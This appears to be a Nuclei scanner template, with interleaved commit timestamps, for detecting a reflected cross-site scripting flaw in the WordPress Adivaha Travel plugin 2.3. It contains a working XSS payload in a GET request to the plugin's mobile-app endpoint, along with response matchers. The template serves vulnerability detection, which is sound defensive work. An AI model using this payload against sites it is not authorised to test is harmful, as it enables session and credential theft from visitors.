2023-10-17 07:20:28 +00:00
id : wp-adivaha-xss
info :
name : WordPress Adivaha Travel Plugin 2.3 - Cross-Site Scripting
author : r3Y3r53
severity : medium
description : |
The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials
reference :
- https://www.exploit-db.com/exploits/51663
metadata :
verified : true
2023-10-17 17:52:26 +00:00
max-request : 1
2023-10-17 07:20:28 +00:00
tags : wordpress,wp,wp-plugin,xss,adivaha,travel
http :
- method : GET
path :
- "{{BaseURL}}/mobile-app/v3/?pid=77A89299&isMobile=%20clq95%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Elb1ra"
matchers :
- type : dsl
dsl :
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "<script>alert(document.domain)</script>", "travelpayout_flight")'
condition : and
2023-10-20 11:41:13 +00:00
# digest: 490a00463044022005403eafdf1f2b41d983f18d6ec92c97c10434633b4b89e4152b2e0a2b35e2f802207cc25e5680b732bdde2a94a85e70a5e3545f07cb180d7ee37eb683abe0f2004b:922c64590222798bb761d5b6d8e72950